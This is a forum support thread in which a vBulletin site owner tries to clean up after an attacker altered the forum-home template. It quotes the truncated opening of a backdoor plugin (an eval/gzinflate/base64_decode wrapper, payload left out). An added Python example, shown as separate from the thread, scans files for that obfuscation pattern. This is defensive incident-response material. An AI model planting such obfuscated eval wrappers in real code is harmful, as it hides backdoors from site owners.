Hacker has changed my FORUMHOME template - how?
VBUsers
10-13-2013, 01:06 AM
How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue, but I don't know how he got in or what to change to stop him from doing this. Please help.
hydrocanna.com
ozzy47
10-13-2013, 01:10 AM
You sure you cleaned out your site completely after you reported being hacked on Oct 4th?
VBUsers
10-13-2013, 01:15 AM
I removed all the plugins that I felt were out of date.
I removed the install folder after upgrading to 4.2.2.
I changed all admin pw and cpanel pw.
What am I missing?
ozzy47
10-13-2013, 01:20 AM
Did you follow all the items in the following links thoroughly?
http://www.vbulletin.com/forum/blogs/zachery/3993888-fixing-your-site-after-you-have-been-hacked
http://www.vbulletin.com/forum/blogs/zachery/3993849-best-practices-for-securing-your-vbulletin-site
VBUsers
10-13-2013, 01:51 AM
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if I should delete that many files. It's quite a bit a few of em. Do I need to look at my plugins next?
How was he able to change the forum home? Are there that many entrances for him to use that we can't narrow it down?
Thank you so much for your help. I've been battling this for months now. It has def killed my community.
Max Taxable
10-13-2013, 01:53 AM
It's not only "narrowed down" it is explained explicitly, at the links provided. :D
ozzy47
10-13-2013, 01:57 AM
Well I would follow everything in the guides, and then you should be good to go.
There is no way of knowing exactly how the forumhome was changed, but at least reverting it seems to have fixed it.
If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.
VBUsers
10-13-2013, 02:05 AM
I found that the hacker got into the admincp and edited a plugin that has this code in it:
if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {
eval(gzinflate(base64_decode('...
The plugin has a lot more code that I can't post in here. Is this plugin the hack they keep getting in from? I deleted this a week ago. How is it back?
VBUsers
10-13-2013, 02:07 AM
Here is the screenshot from the log. How does he not have a username?
I blocked the IP but I'm sure that's not a big deal.
CharlieDelta
10-13-2013, 02:08 AM
There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc..
Make sure you follow the suggestions to a "T" that Ozzy linked.
VBUsers
10-13-2013, 02:12 AM
I have done all that already. I went through it all. I think it has to be a file, but how do I find it?
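An added example, not part of the original thread: one way to act on the advice to check every file and compare the dates is to search for the `eval(gzinflate(base64_decode(` wrapper seen in the edited plugin and list the flagged files newest first. The names `scan_text` and `scan_tree`, the extension list and the sample files are hypothetical, and the sample payload is constructed filler.

```python
import base64
import os
import re
import tempfile

# eval( wrapped around one or more decoder calls, as in the plugin quoted in the thread
DECODERS = r"(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)"
EVAL_CHAIN = re.compile(r"\beval\s*\(\s*(?:" + DECODERS + r"\s*\(\s*)+", re.I)
# a quoted literal of 200+ base64 characters: rarely legitimate in forum code
LONG_B64 = re.compile(r"['\"][A-Za-z0-9+/=]{200,}")


def scan_text(code):
    """Return the reasons a piece of PHP source (file or exported plugin) looks obfuscated."""
    reasons = []
    match = EVAL_CHAIN.search(code)
    if match:
        reasons.append("eval-decode chain: " + re.sub(r"\s+", "", match.group(0)))
    if LONG_B64.search(code):
        reasons.append("long base64 literal")
    return reasons


def scan_tree(root, exts=(".php", ".inc", ".xml")):
    """Walk root and return (path, mtime, reasons) for flagged files, newest first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                reasons = scan_text(fh.read())
            if reasons:
                hits.append((path, os.path.getmtime(path), reasons))
    return sorted(hits, key=lambda hit: hit[1], reverse=True)


if __name__ == "__main__":
    # Constructed sample tree: one clean file, one carrying the wrapper with filler data.
    filler = base64.b64encode(b"A" * 300).decode()
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>")
        with open(os.path.join(root, "hidden.php"), "w") as fh:
            fh.write("<?php eval(gzinflate(base64_decode('" + filler + "'))); ?>")
        for path, mtime, reasons in scan_tree(root):
            print(os.path.basename(path), int(mtime), reasons)
```

The same `scan_text` check can be run over plugin code exported from the database, since the code quoted in this thread was stored in a plugin rather than in a file on disk.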
ozzy47
10-13-2013, 02:15 AM
Did you go through all your files when you ran, Suspect File Versions?
VBUsers
10-13-2013, 02:16 AM
I have, but I have no idea what to look for and I'm not sure what belongs or what I should delete. It's getting to where I want to hire someone but don't know who.
ozzy47
10-13-2013, 02:21 AM
I would post in the paid section then, just remember to follow this.
Before Selecting a User
Once you are contacted by a member offering to fulfill the request, do the following:
1. Search this forum along with http://www.vbulletin.com/forum/ and http://www.vbulletintemplates.com/ for posts by that user and with that user's name. If the posts are generally helpful, then you are usually in good shape. If there are no posts in all three sites or there are a significant number of unhelpful or negative posts, be wary.
2. If appropriate, ask the user for past work examples (a "portfolio"). Note, however, that many service requests are very unique and cannot support a portfolio. Also, there is always an honest user who simply has not had enough jobs yet to build a portfolio.